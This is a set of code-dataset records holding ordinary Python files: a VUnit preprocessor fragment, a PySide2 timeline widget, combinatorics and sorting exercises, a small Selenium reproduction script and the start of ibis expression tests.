self._trailing_paranthesis.match(expr[::-1]).group().count(\")\"),\n ]\n )\n + 1\n )\n top_level_match = find_top_level_match(self._find_operators.finditer(expr), tokens[start:], top_level)\n if top_level_match:\n if top_level == 1:\n left = expr[: top_level_match.start()].strip()\n right = expr[top_level_match.end() :].strip()\n else:\n left = expr[: top_level_match.start()].replace(\"(\", \"\", top_level - 1).strip()\n right = expr[: top_level_match.end() : -1].replace(\")\", \"\", top_level - 1).strip()[::-1]\n\n relation = Relation(left, top_level_match.group(), right)\n\n return relation\n\n\nclass Token(object):\n # pylint: disable=missing-docstring\n NORMAL = 0\n STRING = 1\n CHARACTER_LITERAL = 2\n LINE_COMMENT = 3\n BLOCK_COMMENT = 4\n\n def __init__(self, value):\n self.value = value\n self.type = None\n self.level = None\n\n @property\n def is_comment(self):\n return self.type in [self.LINE_COMMENT, self.BLOCK_COMMENT]\n\n @property\n def is_quote(self):\n return self.type in [self.CHARACTER_LITERAL, self.STRING]\n\n\nclass Relation(object):\n # pylint: disable=missing-docstring\n def __init__(self, left, operand, right):\n self._left = left\n self._operand = operand\n self._right = right\n\n def make_context_msg(self):\n eleft = self._left.replace('\"', '\"\"')\n eright = self._right.replace('\"', '\"\"')\n return (\n f'\"Expected {eleft!s} {self._operand!s} {eright!s}. '\n f'Left is \" & to_string({self._left!s}) & \". '\n f'Right is \" & to_string({self._right!s}) & \".\"'\n )\n","repo_name":"VUnit/vunit","sub_path":"vunit/check_preprocessor.py","file_name":"check_preprocessor.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","stars":651,"dataset":"github-code","pt":"52"} +{"seq_id":"73121318566","text":"import logging\r\nlog = logging.getLogger( __name__ )\r\n\r\nfrom PySide2 import QtWidgets, QtGui, QtCore\r\n\r\n# mouse\r\nRMB = QtCore.Qt.RightButton\r\nLMB = QtCore.Qt.LeftButton\r\nMMB = QtCore.Qt.MiddleButton\r\n\r\n# Keyboard\r\nMOD_ALT = QtCore.Qt.AltModifier \r\nMOD_SHIFT = QtCore.Qt.ShiftModifier\r\n\r\nclass LnF( object ):\r\n\r\n CLOSE = QtWidgets.QStyle.SP_DockWidgetCloseButton\r\n\r\n WARN = QtWidgets.QStyle.SP_MessageBoxWarning\r\n CRIT = QtWidgets.QStyle.SP_MessageBoxCritical\r\n\r\n NO = QtWidgets.QStyle.SP_DialogNoButton # red dot\r\n YES = QtWidgets.QStyle.SP_DialogYesButton # green dot\r\n HELP = QtWidgets.QStyle.SP_DialogHelpButton\r\n TICK = QtWidgets.QStyle.SP_DialogApplyButton\r\n CROS = QtWidgets.QStyle.SP_DialogCancelButton\r\n\r\n DOWN = QtWidgets.QStyle.SP_ArrowDown\r\n SAVE = QtWidgets.QStyle.SP_DialogSaveButton\r\n OPEN = QtWidgets.QStyle.SP_DialogOpenButton\r\n\r\n PLAY = QtWidgets.QStyle.SP_MediaPlay\r\n STOP = QtWidgets.QStyle.SP_MediaStop\r\n FFWD = QtWidgets.QStyle.SP_MediaSeekForward\r\n RRWD = QtWidgets.QStyle.SP_MediaSeekBackward\r\n SKFW = QtWidgets.QStyle.SP_MediaSkipForward\r\n SKBW = QtWidgets.QStyle.SP_MediaSkipBackward\r\n\r\n INFO = QtWidgets.QStyle.SP_FileDialogInfoView\r\n DEAT = QtWidgets.QStyle.SP_FileDialogDetailedView\r\n LIST = QtWidgets.QStyle.SP_FileDialogListView\r\n \r\n MAGF = QtWidgets.QStyle.SP_FileDialogContentsView\r\n BIGX = QtWidgets.QStyle.SP_BrowserStop\r\n\r\n FLDR = QtWidgets.QStyle.SP_DialogOpenButton\r\n RELD = QtWidgets.QStyle.SP_BrowserReload\r\n\r\n NETD = QtWidgets.QStyle.SP_DriveNetIcon\r\n FLPD = QtWidgets.QStyle.SP_DriveFDIcon\r\n\r\n @staticmethod\r\n def getIcon( icon_enum ):\r\n return QtGui.QIcon( QtWidgets.QApplication.style().standardIcon( icon_enum ) )\r\n\r\n @staticmethod\r\n def asPixMap( icon_enum, sz ):\r\n return LnF.getIcon(icon_enum).pixmap( sz )\r\n\r\n\r\nclass QTimeline( QtWidgets.QWidget ):\r\n # Signals\r\n # emits the new frame number (int) when frame changes\r\n requestFrame = QtCore.Signal( int )\r\n\r\n # anounce a rate change. emiting frame period\r\n rateChanged = QtCore.Signal( float )\r\n\r\n # frame changed, not due to playback\r\n frameSkipped = QtCore.Signal()\r\n\r\n RATE_DATA = {\r\n # Human rate : rate, divisor, frame period\r\n \"23.976fps\" : ( 24, 1.001, 41.708333333333336),\r\n \"24fps\" : ( 24, 1.000, 41.666666666666664),\r\n \"25fps\" : ( 25, 1.000, 40.0),\r\n \"29.97fps\" : ( 30, 1.001, 33.36666666666667 ),\r\n \"30fps\" : ( 30, 1.000, 33.333333333333336),\r\n \"47.952fps\" : ( 48, 1.001, 20.854166666666668),\r\n \"48fps\" : ( 48, 1.000, 20.833333333333332),\r\n \"50fps\" : ( 50, 1.000, 20.0),\r\n \"59.94fps\" : ( 60, 1.001, 16.683333333333334),\r\n \"60fps\" : ( 60, 1.000, 16.666666666666668),\r\n }\r\n DEFAULT_RATE = \"60fps\"\r\n\r\n def __init__( self, parent=None ):\r\n super( QTimeline, self ).__init__( parent )\r\n self.setObjectName( \"QTimeline\" )\r\n\r\n # Playing Flag\r\n self._is_playing = False\r\n self.loop_play = False\r\n\r\n # timeline defaults\r\n self._lo = 0\r\n self._hi = 100\r\n self._frame = 0\r\n\r\n # frame period\r\n self._current_rate = self.DEFAULT_RATE\r\n self._period = int( self.RATE_DATA[ self.DEFAULT_RATE ][2] )\r\n\r\n # frame increment\r\n self._frameStep = 1\r\n\r\n # Master clock\r\n self._playTimer = QtCore.QTimer( self )\r\n self._playTimer.setTimerType( QtCore.Qt.PreciseTimer )\r\n self._playTimer.timeout.connect( self.doNextFrame )\r\n\r\n self._buildUI()\r\n self.setDuration( 100 )\r\n\r\n def _buildUI( self ):\r\n layout = QtWidgets.QGridLayout( self )\r\n layout.setContentsMargins( 1, 1, 1, 1 )\r\n layout.setHorizontalSpacing( 2 )\r\n layout.setVerticalSpacing( 2 )\r\n\r\n # Timebar\r\n x, y = 0, 0\r\n\r\n # Play Bar\r\n self.timeslider = QtWidgets.QSlider( self )\r\n #self.timeslider.setToolTip( \"\" )\r\n self.timeslider.setObjectName( \"TimeSlider\" )\r\n self.timeslider.setContentsMargins( 2, 2, 2, 2 )\r\n self.timeslider.setOrientation( QtCore.Qt.Horizontal )\r\n self.timeslider.setRange( self._lo, self._hi )\r\n self.timeslider.setValue( 0 )\r\n self.timeslider.setSizePolicy( QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Maximum )\r\n layout.addWidget( self.timeslider, y, x, 1, 1, alignment=QtCore.Qt.AlignTop )\r\n y = 1\r\n\r\n # Spin Boxes\r\n sub_layout = QtWidgets.QGridLayout()\r\n\r\n self.startSB = QtWidgets.QSpinBox( self )\r\n self.startSB.setStatusTip( \"Start Frame\" )\r\n self.startSB.setButtonSymbols( QtWidgets.QAbstractSpinBox.NoButtons )\r\n self.startSB.setKeyboardTracking( False )\r\n sub_layout.addWidget( self.startSB, 0, 0, 1, 1, alignment=QtCore.Qt.AlignLeft )\r\n\r\n self.currentSB = QtWidgets.QSpinBox( self )\r\n self.currentSB.setStatusTip( \"Current Frame\" )\r\n self.currentSB.setButtonSymbols( QtWidgets.QAbstractSpinBox.NoButtons )\r\n self.currentSB.setKeyboardTracking( False )\r\n self.currentSB.setWrapping( True )\r\n sub_layout.addWidget( self.currentSB, 0, 1, 1, 1, alignment=QtCore.Qt.AlignCenter )\r\n\r\n self.finishSB = QtWidgets.QSpinBox( self )\r\n self.finishSB.setStatusTip( \"End Frame\" )\r\n self.finishSB.setButtonSymbols( QtWidgets.QAbstractSpinBox.NoButtons )\r\n self.finishSB.setKeyboardTracking( False )\r\n sub_layout.addWidget( self.finishSB, 0, 2, 1, 1, alignment=QtCore.Qt.AlignRight )\r\n layout.addLayout( sub_layout, y, x, 1, 1, alignment=QtCore.Qt.AlignTop )\r\n\r\n x += 1\r\n y = 0\r\n\r\n # Transport Controls\r\n # Two state \"Toggle button\"\r\n two_state = QtGui.QIcon()\r\n two_state.addPixmap( LnF.asPixMap(LnF.PLAY, 32), state=QtGui.QIcon.State.Off )\r\n two_state.addPixmap( LnF.asPixMap(LnF.STOP, 32), state=QtGui.QIcon.State.On )\r\n self.playBut = QtWidgets.QPushButton( two_state, \"\", parent=self )\r\n self.playBut.setCheckable( True )\r\n\r\n # The other buttons\r\n self.saveBut = QtWidgets.QPushButton( LnF.getIcon(LnF.SAVE), \"\", parent=self )\r\n self.ffwdBut = QtWidgets.QPushButton( LnF.getIcon(LnF.FFWD), \"\", parent=self )\r\n self.rewdBut = QtWidgets.QPushButton( LnF.getIcon(LnF.RRWD), \"\", parent=self )\r\n self.jgedBut = QtWidgets.QPushButton( LnF.getIcon(LnF.SKFW), \"\", parent=self )\r\n self.jgbgBut = QtWidgets.QPushButton( LnF.getIcon(LnF.SKBW), \"\", parent=self )\r\n\r\n upper_buts = [ self.jgbgBut, self.playBut, self.jgedBut ]\r\n lower_buts = [ self.rewdBut, self.saveBut, self.ffwdBut ]\r\n\r\n for i, but in enumerate( upper_buts ):\r\n layout.addWidget( but, y, x+i, 1, 1 )\r\n\r\n for i, but in enumerate( lower_buts ):\r\n layout.addWidget( but, y+1, x+i, 1, 1 ) \r\n\r\n x += len( upper_buts )\r\n\r\n # Framerate\r\n self.rateComboBox = QtWidgets.QComboBox( )\r\n self.rateComboBox.setStatusTip( \"Framerate\" )\r\n self.rateComboBox.addItems( list( self.RATE_DATA.keys() ) )\r\n self.rateComboBox.setCurrentIndex( self.rateComboBox.findText( self.DEFAULT_RATE ) )\r\n self.rateComboBox.setObjectName( \"RateComboBox\" )\r\n layout.addWidget( self.rateComboBox, y, x, 1, 1 )\r\n y += 1\r\n\r\n # Loop Play\r\n self.loop_play = QtWidgets.QCheckBox( \"Loop Play\", self )\r\n self.loop_play.setChecked( True )\r\n layout.addWidget( self.loop_play, y, x, 1, 1 )\r\n\r\n # UI setup\r\n self.setSizePolicy( QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Maximum )\r\n\r\n # Signals\r\n self.playBut.clicked.connect( self.doToggle )\r\n #self.stopBut.clicked.connect( self.doStop )\r\n self.jgedBut.clicked.connect( self.doEnd )\r\n self.jgbgBut.clicked.connect( self.doBegin )\r\n self.ffwdBut.clicked.connect( self.doFwd )\r\n self.rewdBut.clicked.connect( self.doBwd )\r\n\r\n self.currentSB.valueChanged.connect( self.timeslider.setValue )\r\n\r\n self.rateComboBox.currentIndexChanged.connect( self._cbChangeRate )\r\n\r\n self.timeslider.sliderReleased.connect( self.frameSkipped.emit )\r\n self.timeslider.valueChanged.connect( self.currentSB.setValue )\r\n self.timeslider.valueChanged.connect( self.requestFrame )\r\n\r\n # Logic\r\n\r\n # external functions\r\n def setDuration( self, num_frames ):\r\n self._hi = num_frames\r\n self.startSB.setMinimum( self._lo )\r\n self.startSB.setMaximum( self._hi )\r\n self.startSB.setValue( self._lo )\r\n self.currentSB.setMinimum( self._lo )\r\n self.currentSB.setMaximum( self._hi )\r\n self.finishSB.setMinimum( self._lo + 1 )\r\n self.finishSB.setMaximum( self._hi )\r\n self.finishSB.setValue( self._hi )\r\n self.timeslider.setRange( self._lo, self._hi )\r\n\r\n # Call backs\r\n def _triggerFrame( self, frame ):\r\n self.requestFrame.emit( frame )\r\n self._frame = frame\r\n\r\n def _cbChangeRate( self, index ):\r\n self._current_rate = self.rateComboBox.itemText( index )\r\n self._period = int( self.RATE_DATA[ self._current_rate ][2] )\r\n\r\n if( self._is_playing ):\r\n self._playTimer.stop()\r\n self._playTimer.start( self._period )\r\n\r\n self.rateChanged.emit( self._period ) \r\n\r\n # Transport control buttons\r\n def doPlay( self ):\r\n self._is_playing = True\r\n self._playTimer.start( self._period )\r\n\r\n def doStop( self ):\r\n self._is_playing = False\r\n self._playTimer.stop()\r\n\r\n def doToggle( self ):\r\n if( self._is_playing ):\r\n self._playTimer.stop()\r\n\r\n else:\r\n self._playTimer.start( self._period )\r\n\r\n self._is_playing = not self._is_playing\r\n\r\n def doNextFrame( self, delta=1 ):\r\n frame = self.timeslider.value() + delta\r\n max_f = self.timeslider.maximum()\r\n\r\n if( frame >= max_f ):\r\n if( self.loop_play.isChecked() ):\r\n frame = self.timeslider.minimum()\r\n else:\r\n self.doStop()\r\n\r\n self.timeslider.setValue( frame )\r\n\r\n def doFwd( self ):\r\n frames = self.RATE_DATA[ self._current_rate ][0]\r\n self.doNextFrame( delta=frames )\r\n self.frameSkipped.emit()\r\n\r\n def doBwd( self ):\r\n frames = self.RATE_DATA[ self._current_rate ][0] * -1\r\n self.doNextFrame( delta=frames )\r\n self.frameSkipped.emit()\r\n \r\n def doBegin( self ):\r\n self.timeslider.setValue( self._lo )\r\n self.frameSkipped.emit()\r\n\r\n def doEnd( self ):\r\n self.timeslider.setValue( self._hi )\r\n self.frameSkipped.emit()\r\n\r\n\r\nPOS_CHANGE = QtWidgets.QGraphicsItem.ItemPositionChange\r\nPOS_HAS_CHANGED = QtWidgets.QGraphicsItem.ItemPositionHasChanged\r\n\r\nclass Communicate( QtCore.QObject ):\r\n moving = QtCore.Signal( QtCore.QPointF )\r\n\r\nclass PathHandle( QtWidgets.QGraphicsEllipseItem ):\r\n\r\n DEF_HIGHLIGHT = QtCore.Qt.yellow\r\n \r\n def __init__( self, path, index, colour=QtCore.Qt.green, rad=5, thick=1.3 ):\r\n super( PathHandle, self ).__init__( -rad, -rad, 2*rad, 2*rad )\r\n \r\n self.setAcceptHoverEvents( True )\r\n self.thickness = thick\r\n self.highlight = self.DEF_HIGHLIGHT\r\n self.colour = colour\r\n self.updateDrawing()\r\n self.path = path\r\n self.index = index\r\n self.movable = False\r\n self.touched = False\r\n \r\n self.coms = Communicate()\r\n\r\n self.setZValue( 1 ) # above the path\r\n\r\n self.setFlag( QtWidgets.QGraphicsItem.ItemIsMovable )\r\n self.setFlag( QtWidgets.QGraphicsItem.ItemSendsGeometryChanges )\r\n \r\n def setColour( self, colour ):\r\n self.colour = colour\r\n self.updateDrawing()\r\n \r\n def setHighlight( self, colour ):\r\n self.highlight = colour\r\n \r\n def updateDrawing( self, colour=None ):\r\n colour = colour or self.colour\r\n self.setPen( QtGui.QPen( colour, self.thickness, QtCore.Qt.SolidLine ) )\r\n \r\n # Overloads\r\n def itemChange( self, change, value ):\r\n if( change == POS_HAS_CHANGED and self.movable ):\r\n self.path.updateElement( self.index, value )\r\n if( self.touched ):\r\n # Human directed motion, emit event\r\n self.coms.moving.emit( value )\r\n\r\n return QtWidgets.QGraphicsEllipseItem.itemChange( self, change, value) \r\n\r\n def hoverEnterEvent( self, event ):\r\n self.updateDrawing( self.highlight )\r\n super( PathHandle, self ).hoverEnterEvent( event )\r\n\r\n def hoverLeaveEvent( self, event ):\r\n self.updateDrawing()\r\n super( PathHandle, self ).hoverLeaveEvent( event )\r\n\r\n def mousePressEvent( self, event ):\r\n if( event.button() == LMB ):\r\n self.touched = True\r\n self.path.hideLine( True )\r\n\r\n super( PathHandle, self).mousePressEvent( event )\r\n\r\n def mouseReleaseEvent( self, event ):\r\n if( event.button() == LMB ):\r\n self.touched = False\r\n self.path.hideLine( False )\r\n\r\n super( PathHandle, self ).mouseReleaseEvent( event )\r\n\r\n\r\nclass OpenPath( QtWidgets.QGraphicsPathItem ):\r\n \r\n SZ = 1.75\r\n LINE_SOLID = QtCore.Qt.SolidLine\r\n LINE_DASH = QtCore.Qt.DashLine\r\n LINE_DOTS = QtCore.Qt.DotLine\r\n LINE_NONE = QtCore.Qt.NoPen\r\n \r\n def __init__( self, path, scene, colour=QtCore.Qt.black, receiver=None ):\r\n super( OpenPath, self ).__init__( path )\r\n self.colour = colour\r\n self.line_style = self.LINE_SOLID\r\n self.can_hide = False\r\n \r\n num_cvs = path.elementCount()\r\n self._handles = {}\r\n \r\n for i in range( num_cvs ):\r\n handle = PathHandle( self, i )\r\n handle.setPos( QtCore.QPointF( path.elementAt( i ) ) )\r\n scene.addItem( handle )\r\n self._handles[ i ] = handle\r\n if( receiver is not None ):\r\n handle.coms.moving.connect( receiver )\r\n\r\n for i in range( num_cvs ):\r\n self._handles[ i ].movable = True\r\n\r\n self.setPen( QtGui.QPen( self.colour, self.SZ, self.line_style ) )\r\n\r\n #self.setFlag( QtWidgets.QGraphicsItem.ItemIsSelectable, True )\r\n #self.setFlag( QtWidgets.QGraphicsItem.ItemIsMovable, True )\r\n self.setFlag( QtWidgets.QGraphicsItem.ItemSendsGeometryChanges, True )\r\n \r\n def hideLine( self, state ):\r\n if( not self.can_hide ):\r\n return\r\n\r\n if( state ):\r\n self.setStyle( OpenPath.LINE_NONE )\r\n else:\r\n self.setStyle( self.line_style )\r\n\r\n def setColour( self, colour ):\r\n self.colour = colour\r\n self.setPen( QtGui.QPen( self.colour, self.SZ, self.line_style ) )\r\n \r\n def setStyle( self, style ):\r\n self.setPen( QtGui.QPen( self.colour, self.SZ, style ) )\r\n \r\n def updateElement( self, index, pos ):\r\n path = self.path() \r\n path.setElementPositionAt( index, pos.x(), pos.y() )\r\n self.setPath( path )\r\n\r\n def reportCVs( self ):\r\n path = self.path()\r\n ret = \"\"\r\n for i in range( path.elementCount() ):\r\n el = path.elementAt( i )\r\n ret += \"({},{}) \".format( el.x, el.y )\r\n print( ret )\r\n\r\n def styleHandles( self, colour=None, thick=None ):\r\n for hand in self._handles.values():\r\n if( colour is not None ):\r\n hand.colour = colour\r\n \r\n if( thick is not None ):\r\n hand.thickness = thick\r\n\r\n hand.updateDrawing()\r\n\r\n def shape( self ):\r\n qp = QtGui.QPainterPathStroker()\r\n qp.setWidth( 10 )\r\n qp.setCapStyle( QtCore.Qt.SquareCap )\r\n shape = qp.createStroke( self.path() )\r\n return shape\r\n\r\n def itemChange( self, change, value ):\r\n if( change == POS_CHANGE and self.isSelected() ):\r\n # update Handles with new positions\r\n path = self.path()\r\n for i in range( path.elementCount() ):\r\n hand = self._handles[ i ]\r\n hand.movable = False\r\n hand.setPos( QtCore.QPointF( path.elementAt( i ) ) + value )\r\n hand.movable = True\r\n hand.update()\r\n\r\n return super( OpenPath, self ).itemChange( change, value )\r\n\r\n \r\nclass ClosedPath( OpenPath ):\r\n\r\n def __init__( self, path, scene, colour=QtCore.Qt.black, receiver=None ):\r\n num_cvs = path.elementCount()\r\n self._roots = { 0 : num_cvs-1, num_cvs-1 : 0 }\r\n super( ClosedPath, self ).__init__( path, scene, colour, receiver )\r\n \r\n def updateElement( self, index, pos ):\r\n \"\"\" Overload to move 1st and last handles at once \"\"\"\r\n path = self.path()\r\n if( index in self._roots ):\r\n # get the \"other\" node if this is the root\r\n other_idx = self._roots[ index ]\r\n other = self._handles[ other_idx ]\r\n # Update path\r\n path.setElementPositionAt( other_idx, pos.x(), pos.y() )\r\n # Update Handle\r\n other.movable = False\r\n other.setPos( pos )\r\n other.movable = True\r\n \r\n path.setElementPositionAt( index, pos.x(), pos.y() )\r\n self.setPath( path )\r\n\r\n def setFillAlpha( self, alpha=0 ):\r\n col = QtGui.QColor( self.colour )\r\n col.setAlpha( alpha )\r\n self.setBrush( QtGui.QBrush( col ) )\r\n","repo_name":"bit-meddler/skunkWorks","sub_path":"pyVideoPlayers/vidGUI.py","file_name":"vidGUI.py","file_ext":"py","file_size_in_byte":17653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5426199352","text":"#计算列表排列组合的Python方法\r\nfrom typing import List\r\n#整数阶乘\r\ndef factorial(n: int) -> int:\r\n if n <= 0:\r\n return 1\r\n else:\r\n return n * factorial(n - 1)\r\n\r\n#全排列个数\r\ndef permutationCount(n:int) -> int:\r\n return factorial(n)\r\n\r\n#n元素中取m个组合个数\r\ndef combinationCount(n:int, m:int) -> int:\r\n return factorial(n) // (factorial(m) * factorial(n-m))\r\n\r\n# 子集列表\r\ndef subsets(nums: List[int]) -> List[List[int]]:\r\n q = [[]]\r\n n = len(nums)\r\n for i in range(n):\r\n for j in range(len(q)):\r\n q.append(q[j] + [nums[i]])\r\n return q\r\n\r\n# n个数选m的组合列表\r\ndef combinations(nums: List[int], k: int) -> List[List[int]]:\r\n q = [[]]\r\n n = len(nums)\r\n for i in range(n):\r\n for j in range(len(q)):\r\n q.append(q[j] + [nums[i]])\r\n return [x for x in q if len(x) == k]\r\n\r\n# 全排列\r\npermList = []\r\ndef allPermutations(list, stack):\r\n # 列表中的元素都已加入,���回结果\r\n if not list:\r\n permList.append([x for x in stack])\r\n else: # 没有到树的叶子节点的时候,使用递归继续往下找。\r\n for i in range(len(list)):\r\n stack.append(list[i])\r\n del list[i]\r\n allPermutations(list, stack)\r\n list.insert(i, stack.pop())\r\n\r\n# 选择排列\r\npermList2 = []\r\ndef permutations(n, begin, end):\r\n if begin >= end:\r\n permList2.append(n)\r\n else:\r\n i = begin\r\n for num in range(begin, end):\r\n n[num], n[i] = n[i], n[num]\r\n permutations(n, begin + 1, end)\r\n n[num], n[i] = n[i], n[num]\r\n\r\nprint(subsets([1, 2, 3, 4]), end=\"\")\r\nprint(combinations([1, 2, 3, 4], 2), end=\"\")\r\nprint(factorial(10))\r\nprint(permutationCount(3))\r\nprint(combinationCount(5,3))\r\nallPermutations([1,2,3,4], [])\r\nprint(permList)","repo_name":"yangdanbo/AICodingBeginner","sub_path":"TianChiLeetCode/Python3/mathTools.py","file_name":"mathTools.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30324344479","text":"'''\n 프로그래머스 : 실습용 로봇(PCCP)\n https://school.programmers.co.kr/tryouts/72140/challenges?language=python3\n'''\n\ndef solution(command):\n path = [[0,1], [1,0], [0,-1], [-1,0]]\n x = 0\n y = 0\n d = 0\n \n for i in command:\n if i == 'R':\n d = (d+1) % 4\n elif i == 'L':\n d = (d+3) % 4\n elif i == 'G':\n x += path[d][0]\n y += path[d][1]\n else:\n x -= path[d][0]\n y -= path[d][1]\n \n return [x, y]\n\ncommand = \"GRGLGRG\"\nprint(solution(command))\n# \t[2, 2]","repo_name":"kimkihyun1/TIL","sub_path":"CodingTest/2308/230811.py","file_name":"230811.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35115688999","text":"def merge_sort(arr):\n if len(arr) == 1:\n return arr\n else:\n half = len(arr) // 2\n return sorted_merge_arrays(\n merge_sort(arr[:half]),\n merge_sort(arr[half:])\n )\n\n\ndef sorted_merge_arrays(arr1, arr2):\n rez = []\n i = 0\n j = 0\n while True:\n if i == len(arr1):\n return rez + arr2[j:]\n if j == len(arr2):\n return rez + arr1[i:]\n if arr1[i] < arr2[j]:\n rez.append(arr1[i])\n i += 1\n else:\n rez.append(arr2[j])\n j += 1\n \n return rez\n\n\ndef main():\n # print(\n # sorted_merge_arrays(\n # [1, 3, 28, 99],\n # [4, 5, 6, 29]\n # )\n # )\n print(\n merge_sort([11, 18, 5, 4, 12, 15, 1, 13, 8, 16])\n )\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"adgh-dev/ubiquitous-octo-broccoli","sub_path":"merge-sort.py","file_name":"merge-sort.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5814266907","text":"\"\"\"\n# Definition for a Node.\nclass Node(object):\n def __init__(self, val, left, right, next):\n self.val = val\n self.left = left\n self.right = right\n self.next = next\n\"\"\"\nclass Solution(object):\n def connect(self, root):\n \"\"\"\n :type root: Node\n :rtype: Node\n \"\"\"\n # if root and root.left and root.right:\n # root.left.next = root.right\n # if root.next:\n # root.right.next = root.next.left\n # self.connect(root.left)\n # self.connect(root.right)\n # return root\n \n # BFS\n if not root:\n return\n queue = [root]\n while queue:\n cur = queue.pop(0)\n if cur.left and cur.right:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n queue.append(cur.left)\n queue.append(cur.right)\n return root\n","repo_name":"shaniavina/Leetcode_Python","sub_path":"116_populating_next_right_pointers_in_each_node.py","file_name":"116_populating_next_right_pointers_in_each_node.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2184641747","text":"import selenium\nfrom selenium import webdriver\nfrom selenium.webdriver import ChromeOptions\nhub = 'http://selenium-hub:4444'\nwebA = 'http://webA:3000'\ndriver = webdriver.Remote(command_executor=hub, options=ChromeOptions())\ndriver.set_page_load_timeout(5)\ninput(\"Press Enter to continue...\")\ndriver.get(webA)\nprint(driver.current_url)\ndriver.quit()","repo_name":"dbire/selenium_issue_11528","sub_path":"selenium_tests/test_webA.py","file_name":"test_webA.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24788843466","text":"from __future__ import annotations\n\nimport pytest\n\nimport ibis\nimport ibis.expr.operations as ops\nimport ibis.expr.types as ir\nfrom ibis import _\nfrom ibis.common.annotations import SignatureValidationError\nfrom ibis.tests.util import assert_equal\n\n\n@pytest.fixture\ndef sql_table():\n return ibis.table(\n [\n (\"v1\", \"decimal(12, 2)\"),\n (\"v2\", \"decimal(10, 4)\"),\n (\"v3\", \"int32\"),\n (\"v4\", \"int64\"),\n (\"v5\", \"float32\"),\n (\"v6\", \"double\"),\n (\"v7\", \"string\"),\n (\"v8\", \"boolean\"),\n ],\n \"testing\",\n )\n\n\n@pytest.fixture(params=(ibis.coalesce, ibis.greatest, ibis.least))\ndef function(request):\n return request.param\n\n\n@pytest.mark.parametrize(\n \"colname\",\n [\n \"tinyint_col\",\n \"smallint_col\",\n \"int_col\",\n \"bigint_col\",\n \"float_col\",\n \"double_col\",\n ],\n)\ndef test_abs(functional_alltypes, lineitem, colname):\n fname = \"abs\"\n op = ops.Abs\n\n expr = functional_alltypes[colname]\n _check_unary_op(expr, fname, op, type(expr))\n\n expr = lineitem.l_extendedprice\n _check_unary_op(expr, fname, op, type(expr))\n\n\ndef test_group_concat(functional_alltypes):\n col = functional_alltypes.string_col\n\n expr = col.group_concat()\n assert isinstance(expr.op(), ops.GroupConcat)\n op = expr.op()\n assert op.sep == ibis.literal(\",\").op()\n assert op.where is None\n\n expr = col.group_concat(\"|\")\n op = expr.op()\n assert op.sep == ibis.literal(\"|\").op()\n assert op.where is None\n\n\ndef test_zeroifnull(functional_alltypes):\n with pytest.warns(FutureWarning):\n dresult = functional_alltypes.double_col.zeroifnull()\n\n with pytest.warns(FutureWarning):\n iresult = functional_alltypes.int_col.zeroifnull()\n\n assert type(dresult.op()) == ops.Coalesce\n assert type(dresult) == ir.FloatingColumn\n\n # Impala upconverts all ints to bigint. Hmm.\n assert type(iresult) == type(iresult)\n\n\ndef test_fillna(functional_alltypes):\n result = functional_alltypes.double_col.fillna(5)\n assert isinstance(result, ir.FloatingColumn)\n\n assert isinstance(result.op(), ops.Coalesce)\n\n result = functional_alltypes.bool_col.fillna(True)\n assert isinstance(result, ir.BooleanColumn)\n\n # Highest precedence type\n result = functional_alltypes.int_col.fillna(functional_alltypes.bigint_col)\n assert isinstance(result, ir.IntegerColumn)\n\n\ndef test_ceil_floor(functional_alltypes, lineitem):\n cresult = functional_alltypes.double_col.ceil()\n fresult = functional_alltypes.double_col.floor()\n assert isinstance(cresult, ir.IntegerColumn)\n assert isinstance(fresult, ir.IntegerColumn)\n assert type(cresult.op()) == ops.Ceil\n assert type(fresult.op()) == ops.Floor\n\n cresult = ibis.literal(1.2345).ceil()\n fresult = ibis.literal(1.2345).floor()\n assert isinstance(cresult, ir.IntegerScalar)\n assert isinstance(fresult, ir.IntegerScalar)\n\n dec_col = lineitem.l_extendedprice\n cresult = dec_col.ceil()\n fresult = dec_col.floor()\n assert isinstance(cresult, ir.DecimalColumn)\n assert cresult.type() == dec_col.type()\n\n assert isinstance(fresult, ir.DecimalColumn)\n assert fresult.type() == dec_col.type()\n\n\ndef test_sign(functional_alltypes, lineitem):\n result = functional_alltypes.double_col.sign()\n assert isinstance(result, ir.FloatingColumn)\n assert type(result.op()) == ops.Sign\n\n result = ibis.literal(1.2345).sign()\n assert isinstance(result, ir.FloatingScalar)\n\n dec_col = lineitem.l_extendedprice\n result = dec_col.sign()\n assert isinstance(result, ir.DecimalColumn)\n\n\ndef test_round(functional_alltypes, lineitem):\n result = functional_alltypes.double_col.round()\n assert isinstance(result, ir.IntegerColumn)\n assert result.op().args[1] is None\n\n result = functional_alltypes.double_col.round(2)\n assert isinstance(result, ir.FloatingColumn)\n assert result.op().args[1] == ibis.literal(2).op()\n\n # Even integers are double (at least in Impala, check with other DB\n # implementations)\n result = functional_alltypes.int_col.round(2)\n assert isinstance(result, ir.FloatingColumn)\n\n dec = lineitem.l_extendedprice\n result = dec.round()\n assert isinstance(result, ir.DecimalColumn)\n\n result = dec.round(2)\n assert isinstance(result, ir.DecimalColumn)\n\n result = ibis.literal(1.2345).round()\n assert isinstance(result, ir.IntegerScalar)\n\n\ndef _check_unary_op(expr, fname, ex_op, ex_type):\n result = getattr(expr, fname)()\n assert type(result.op()) == ex_op\n assert type(result) == ex_type\n\n\ndef test_coalesce_instance_method(sql_table):\n v7 = sql_table.v7\n v5 = sql_table.v5.cast(\"string\")\n v8 = sql_table.v8.cast(\"string\")\n\n result = v7.coalesce(v5, v8, \"foo\")\n expected = ibis.coalesce(v7, v5, v8, \"foo\")\n 